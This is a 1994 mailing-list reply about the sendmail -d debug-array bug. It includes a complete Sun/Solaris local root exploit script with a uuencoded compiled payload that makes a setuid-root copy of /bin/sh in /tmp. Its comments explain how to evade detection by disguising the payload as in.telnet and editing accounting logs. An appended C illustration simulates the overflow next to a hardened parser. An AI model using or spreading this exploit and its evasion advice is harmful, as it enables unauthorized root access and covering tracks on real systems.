Re: Latest sendmail bug?

Michael R. Widner (widnerm@hsd.utc.com)
20 Jul 1994 10:17:04 -0400 (EDT)

In a previous message, Doug McLaren said:
> | > Does anyone have an exploit script we can use to test yet?
> | > The worst bug exploits sendmail -d and can be used to gain root
> | > according to CERT.
> | 
> | an exploit script was posted to this list a few months back.
> 
> Um, I checked and never found said script.
> 

The last sendmail -d hole script was posted somewhere back around March I
believe.  I've seen several different varieties, each of which has its
strong points and weaknesses as an exploit script.  The important thing to
know is that if your sendmail crashes when you pass it something like
-d387654321 then it can most likely be exploited to gain root access.

Without going into much detail, -dx.y writes y into the debug array as
array[x]=y.  Range checking is not performed properly on x, so it's possible
to pass negative integers that pass the range check.  Find a key location
before the debug array, overwrite it, and you're in business.

The problem in trying to create a generic script is that the 'key' locations
have different offsets from the debug array for every version of sendmail.
Sometimes they're easy to locate if you can get a core, but sometimes it is
tough to get a core w/o already being root.  Also, sometimes a core tells
you nothing.

The following script is Sun specific, and patches are now available for
all versions of Sun sendmail.  The script creates a suid root owned copy
of /bin/sh and places it in /tmp.  If you're hacking solaris, I'd suggest
you choose some program other than /bin/sh.

For the curious and paranoid, the uuencoded script is a compiled, compressed,
and uuencoded version of the following c prog, compiled under sunos.
#include <stdlib.h>
#include <unistd.h>
#include <sys/stat.h>
int main(void)	/* runs as root inside sendmail: make the staged /tmp/newsh setuid root */
{ setuid(0); chown("/tmp/newsh", 0, 0); chmod("/tmp/newsh", 04755);
        exit(0); }

I put it in this way because solaris lacks a bundled compiler.

Of course, I may be lying.  It may really be a uuencoded program that does
main() { unlink("/");}, but you'll just have to trust me.

I should point out that Sun sendmail is in no way unique in its vulnerability
to this hole.

It's also worth noting, for Solaris administrators and hackers, that the
normal Solaris patch procedure will leave the old (pre-patched) versions of
sendmail in their broken and SUID state under /var/sadm/patch.  This should
be fixed, if you haven't done it already.

--
Michael R. Widner    <widnerm@hsd.utc.com>

---------------------------
#!/bin/sh
# This script takes advantage of sendmail's (mis)interpretation of
# very large unsigned ints as signed ints when accessing the debug
# array.  As it, it will work with the 8 versions of sun sendmail
# that I have access to.  Perhaps I'll update it if I find new
# versions of sun sendmail.
# NOTE:  This is a Sun specific script.  Don't expect it to work with
#        any non-sun sendmail.
# -Michael R. Widner (atreus)        3/25/94
#
# usage:  smdhole [/path/to/suid/sendmail]
#

# add /usr/ucb to PATH so solaris can find `whoami` (4/18/94)
# (the Bourne shell variable is PATH; the csh-style lowercase `path` is ignored by /bin/sh)
PATH=$PATH:/usr/ucb; export PATH

if [ $1x = x ]; then
	sendmail=/usr/lib/sendmail
else
	echo "Trying to abuse $1."
	sendmail=$1
fi

# size of the suid sendmail, used below to pick the offsets.  The size column
# lands in field 4 or 5 depending on whether `ls -l` prints a group column,
# so grab both fields and keep only the digits.
sm_size=`echo \`ls -l $sendmail\` | cut -d" " -f4,5 | sed "s/[^0-9]//g"`

# prefix and suffix for -1 as unsigned integer.  Actually, this is
# off by two.  you figure out why.
prefix=42949
suffix=67297

case $sm_size in
	132064)
		n1=${prefix}52864
		n2=${prefix}52865
		n3=${prefix}52866
		echo Patched solaris w/o mx.
		;;
	134752) # ug! dropped a 0 before.  fixed 4/18/94
		n1=${prefix}01656
		n2=${prefix}01657
		n3=${prefix}01658
		echo Patched solaris sendmail.mx
		;;
	130860)
		n1=${prefix}53016
		n2=${prefix}53017
		n3=${prefix}53018
		echo Un-patched solaris w/o mx.
		;;
	133548) # ug! dropped a 0 before.  fixed 4/18/94
		n1=${prefix}01808
		n2=${prefix}01809
		n3=${prefix}01810
		echo Un-patched solaris sendmail.mx
		;;
	139264)
		n1=${prefix}49609
		n2=${prefix}49610
		n3=${prefix}49611
		echo Sun 4.1.3 sendmail - could be either of two versions
		n4=${prefix}49265
		n5=${prefix}49266
		n6=${prefix}49267
		;;
	155648)
		n1=${prefix}46953
		n2=${prefix}46954
		n3=${prefix}46955
		echo Sun 4.1.3 sendmail.mx - could be either of two versions
		n4=${prefix}46609
		n5=${prefix}46610
		n6=${prefix}46611
		;;
	*)
		echo "I don't know what version of sendmail $sendmail is."
		echo "Look for other versions of sendmail[.mx] on the system and re-run this as:"
		echo "     $0 /path/to/another/suid/sendmail"
		echo
		echo "Let me see if I can suggest anything..."
		find /usr/lib /var/sadm/patch -name "*sendm*" -perm -4001 -ls 2>/dev/null
		exit 1
		;;
	esac

cat << EOM > /tmp/sendmail.cf
DMether
DRlocalhost
CRlocalhost
CDMailer-Daemon root daemon uucp
DlFrom \$g  \$d
Do.:%@!^=/[]
Dq\$g\$?x (\$x)\$.
De\$j nothing
OA./aliases
OF0666
Og1
OL0
Oo
OPPostmaster
OQ.
Os
Ou1
T root daemon uucp

H?F?From: nobody

Mlocal,	P=/tmp/in.telnet, F=flsSDFMmnP, S=10, R=20, A=mail -d \$u
Mprog,	P=/tmp/in.telnet,   F=lsDFMeuP,  S=10, R=20, A=sh -c \$u

S0
R\$+			\$#local \$:\$1			just rewrite
EOM

cat $0 | sed "s:atreus::" | uudecode
uncompress /tmp/in.telnet.Z
chmod 755 /tmp/in.telnet

mkdir /tmp/mail
cp /tmp/sendmail.cf /tmp/mail

cp /bin/sh /tmp/newsh
chmod 666 /tmp/newsh

$sendmail -d${n1}.116,${n2}.109,${n3}.112 `whoami`  <<EOF

test
EOF

if [ -x /tmp/newsh ]; then
	echo "Had the right offset for sendmail.cf.  Here's the result:"
else
	echo "Looks like I had the wrong sendmail.cf offset.  Fuckers."
	if [ ${n4}x = x ]; then
		echo "This version isn't what I thought it was."
		echo "Look for other suid sendmails and try this on them."
	else
		echo "I'm taking another stab with a different offset."
$sendmail -d${n4}.116,${n5}.109,${n6}.112 `whoami` <<EOF

test
EOF
		echo "Here's the result:"
	fi
fi

rm /tmp/in.telnet
rm -r /tmp/mail
rm /tmp/sendmail.cf
ls -l /tmp/newsh

exit

# I'm calling this in.telnet for one reason.  It shows up in the acct logs
# as being run by root.  It will attract less attention if it's something
# normally run by root.  An alert admin will catch is anyway, because
# in.telnet is normally not associated with a tty.  The obvious fix, if you
# want to go undetected, would be to modify the acct files once you've
# become root.
begin 775 /tmp/in.telnet.Z
M'YV0@08$6    (B"!A$J5 CBX,*"O" <A#8 %!!)%8E44@%" "4!H A\!*+@atreus
M0D$(U$2  S:@( )A ,0@  0)0  !@  0"( 02$$%/ OZ1+"S9T%'G$:  C%4atreus
MH%&B00%T&O<+S0N7KBJ(0Q'!)20)(ACX!+!$DD0 K"  0( 1%)>Q2RA)! %(atreus
M5$,).9]$%38!E!= H,(LP$LV*KJ*8(15)".N(AI2!6Q*(@ HPM6U6<4A@716atreus
M+H@"%QQ:D@!. ":U%L;2T'36E%H$D 0 H"!ML><#H0N.!B?A-(#4!5>PGGT9atreus
M068Z7==^%;%A[ BS!U6]5@P*#4V;. $L*)YY,P%@$LP"B' [-X#=O=56&'N!atreus
M]4'J<$(""V!.*1]U2@&Q4TJHY5J8,@FC%"+^00 3&, (" HC_B$@" 1@D*$@atreus
M))R!$, GQ!0$'1^!' ,. H&@<U).!CSX&00Y$6#B$2@"((") T0"S4$*I!A5atreus
M(,-\&%6% DA2 #@$4%, , "82(",!U7XAXD!(&G4"W7,(<<+;*0A!I5DN##'atreus
M&P"\0$89=KR@1QER</E0!F/(00<,.H#@QAL@0"DEE59BJ>4;"CP$@ EIKMFFatreus
MG%-6>24;66X)0AMAP %'&FZ< 8(98:3!1AURE)'G0A3TR::;<'H)IIADXKG0atreus
M"W2T <<+;I1QQQQH%#35+Y",%40(+OET@!X5 @ )!2)  AT MN;AF:Z\Q@K atreus
M 7F8E4([MJZ1:X<?AOC0JY DAY( ((!3UR__$-: )!)D"XT 8%!FEXLY)3"Latreus
M)>02\*LD[8X+Q )U'20!M_U\!$H DDB24W8*6"M*N."$H@(8 D!#P'B?P&03atreus
M0J 0\@,_,N"K\'C0@BBB5%15>Y(TV')3%QCH I  *.%R<S$ #1<4$@@$K%POatreus
M /?^LT]4R<$&%CBV(O%KQM)R#.L$)XT+!C,S$T9 A0'\\<\_YT CPM% ;_P0atreus
M$&P41( E3_^3(;!X%)0 UT_3(A0A!15 ]C^L"%43  VLO3$0G!2TP-K8"(7*atreus
M3VLS(Y39 #BP-A,(^0>  0BI51#1!36 $ 4(1>7X0Y$5)%M!!R"TL$L(50[ atreus
MI8<CE !"F1?D $((($20V @Q@!#HBFN'T .M(Y1<X'K2_M#M$B#4^T.,8ZHGatreus
M )$=P$A!)R!!>N8&A"-4WJ:/7H#?P%H]060%G&Z00P!DP-, 8NA9 D\&B*,Gatreus
M"Y$-X$=!(M1=D R9%R"'4$06M$/F!^0@E$)%? ^*GDO@R0% IQ I") %>LI"atreus
M9 A@BH*,@!0("0-/B**G-)"/#GJ20^9,(Q1H((00HSM ')Z'D$F,3@#3$ HXatreus
M$"**R!@@#P[$ D)JX<)$L&^%!4%&_/X'+&1\H0QT* ,>,/A#,H2!#F$ P _=atreus
M0 8 S &):G(B%.GP!3.PX0U'5.(/\9 &(B**44HL@QOLD(8RN4&+1,B"$X+0atreus
MA"0,(8Q<).(8T-"&-S3Q"W-\PQW.^(4^?I&/<P!B'=)PQS>X88M=U*(0N_@%atreus
M,M2A#6W(0R/+,(:L]?$+0Z#"$Z3P!28D80I4Z*,6OT $37+2DZ 4Y27)\(8Oatreus
MG.&*8@@#&_!(AS?(80ZC9*4K82G+1M;REHJ,8R,?&<DO5,H,PWM!&<I ACG8atreus
M84ID2,,<UC #*KUA#+*DTY7.,(8QM$!0+Y@#',(@!V_.H0YN:,$YWS0'&K@@atreus
M!BZHI@Q<4(-XZD"9S'0F-*5)36MBDPW:'-X!Z**0"6).<0<004XB]Y Q ( ,atreus
M61N>1"=*T8I:]*(8S:A&-\K1CGKTHR -J4A'2M*2FO2D*$VI2E?*TI:Z]*4Patreus
MC:E,9TK3FMKTICC-J4YWRM.>^O2G0 VJ4(=*U*(:]:A(3:I2E\K4ICKUJ5"-atreus
MJE2G2M6J6O6J6,VJ5K?*U:YZ]:M@#:M8QTK6LIKUK&A-JUK7RM:VNO6M<(VKatreus
M7.=*U[K:]:YXS>M2_0,$UP&+!"<MW>'V!BPN"(5D !B !W4"6)U0;R&5*P Ratreus
M$()#[@$ L3XQ7"" 0;*HO H43OL'/SQ+%= ^+1]!"<!G0VN/H A@M4^;1U &atreus
M -M_P",H!*AM.X)2@-JJ(RB(DR@0%JO7XAKWN,A-KG*7R]SF.O>YT(VN=*=+atreus
MW>I:][K8S:YVM\O=[GKWN^ -KWC'2][RFO>\Z$VO>M?+WO:Z][WPC:]\YTO?atreus
+^MKWOOC-KW[WFUS=atreus
 atreus
endatreus
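The hole the message describes (-dx.y as array[x]=y with a range check that a wrapped negative x slips past, and the script's -d${n1}.116,${n2}.109,${n3}.112, which writes the bytes 't', 'm', 'p'), as an added C illustration.  It is not part of the original message and not sendmail's source: the debug-vector size TTSIZE, the hypothetical `struct image` layout with a config path sitting just below the vector, and the function names are assumptions chosen so that the three writes turn /etc/sendmail.cf into the /tmp/sendmail.cf the script creates (the target string is my reading of the script's "right offset for sendmail.cf" message); it also assumes a 32-bit int/unsigned with the usual modular unsigned-to-int conversion.  The hardened parser beside it rejects, rather than clamps, anything outside the vector.

```c
/*
 * Added illustration of the sendmail "-d" debug-flag bug; NOT sendmail's
 * source.  -dX.Y (or -dX-Z.Y) sets debug levels X..Z to Y.  The digits are
 * accumulated in an unsigned int, copied to a signed int index, and only
 * "index >= size" is tested, so 4294967295 becomes -1, passes the test and
 * is written in front of the vector.  Layout and names below are assumed.
 */
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define TTSIZE 100                    /* assumed size of the debug vector */

struct image {                        /* hypothetical process layout */
    char cfname[24];                  /* the "key location": config path */
    unsigned char tvect[TTSIZE];      /* the debug vector */
};

/* Decimal run accumulated in an unsigned int, as the bug requires. */
static unsigned parse_num(const char **sp)
{
    unsigned i = 0;
    while (isdigit((unsigned char)**sp))
        i = i * 10u + (unsigned)(*(*sp)++ - '0');
    return i;
}

/* Vulnerable: clamps the upper bound only.  Returns the number of writes. */
static int vuln_tTflag(struct image *img, const char *s)
{
    int written = 0;
    for (;;) {
        int first = (int)parse_num(&s);     /* unsigned -> int: 2^32-1 is -1 */
        int last = first;
        unsigned level = 1;
        if (*s == '-') { s++; last = (int)parse_num(&s); }
        if (*s == '.') { s++; level = parse_num(&s); }
        if (first >= TTSIZE) first = TTSIZE - 1;   /* no "first < 0" test */
        if (last >= TTSIZE) last = TTSIZE - 1;
        while (first <= last) {
            /* tTvect[first] = level, done as byte arithmetic on img so a
               negative index stays a defined access in this demo; sendmail
               itself had no such fence and wrote wherever the index landed. */
            long off = (long)offsetof(struct image, tvect) + first;
            if (off >= 0 && off < (long)sizeof *img)
                ((unsigned char *)img)[off] = (unsigned char)level;
            first++;
            written++;
        }
        if (*s != ',') return written;
        s++;
    }
}

/* Hardened parsing: overflow-checked digits, and every bound rejected
   (not clamped) when it falls outside [0, TTSIZE).  -1 means bad input. */
static int parse_checked(const char **sp, unsigned *out)
{
    unsigned long long v = 0;
    if (!isdigit((unsigned char)**sp)) return -1;
    while (isdigit((unsigned char)**sp)) {
        v = v * 10 + (unsigned)(*(*sp)++ - '0');
        if (v > 0xFFFFFFFFULL) return -1;       /* does not fit in 32 bits */
    }
    *out = (unsigned)v;
    return 0;
}

static int safe_tTflag(struct image *img, const char *s)
{
    int written = 0;
    for (;;) {
        unsigned first, last, level = 1;
        if (parse_checked(&s, &first) < 0) return -1;
        last = first;
        if (*s == '-') { s++; if (parse_checked(&s, &last) < 0) return -1; }
        if (*s == '.') { s++; if (parse_checked(&s, &level) < 0) return -1; }
        /* unsigned comparison: a "negative" value is simply a huge one */
        if (first >= TTSIZE || last >= TTSIZE || first > last || level > 255)
            return -1;
        for (; first <= last; first++, written++)
            img->tvect[first] = (unsigned char)level;
        if (*s == '\0') return written;
        if (*s++ != ',') return -1;
    }
}

/* The script's -d${n1}.116,${n2}.109,${n3}.112 for this layout: three
   indices that wrap to cfname[1..3], carrying the bytes 't', 'm', 'p'. */
static const char *attack_flag(void)
{
    static char buf[64];
    unsigned n1 = (unsigned)(1 - (long)offsetof(struct image, tvect));
    snprintf(buf, sizeof buf, "%u.116,%u.109,%u.112", n1, n1 + 1, n1 + 2);
    return buf;
}

/* Feed a flag string to the vulnerable parser on a fresh image and report
   what the config path looks like afterwards. */
static const char *vuln_cfname_after(const char *flag)
{
    static struct image img;
    memset(&img, 0, sizeof img);
    strcpy(img.cfname, "/etc/sendmail.cf");   /* constructed sample target */
    vuln_tTflag(&img, flag);
    return img.cfname;
}

/* Same string through the hardened parser: writes done, or -1 if rejected. */
static int safe_result(const char *flag)
{
    static struct image img;
    memset(&img, 0, sizeof img);
    return safe_tTflag(&img, flag);
}

int main(void)
{
    printf("flag %s\n  vulnerable parser leaves path: %s\n  hardened parser: %d\n",
           attack_flag(), vuln_cfname_after(attack_flag()), safe_result(attack_flag()));
    return 0;
}
```

Build with cc and run: main() prints the flag string, the path after the vulnerable parser ("/tmp/sendmail.cf") and the hardened parser's verdict (-1).  The whole bug is the clamp on the upper bound only; comparing the index as an unsigned value against TTSIZE, as safe_tTflag does, catches a "negative" index because it is simply a very large one, and rejecting instead of clamping keeps a crafted flag from silently landing on tTvect[TTSIZE-1].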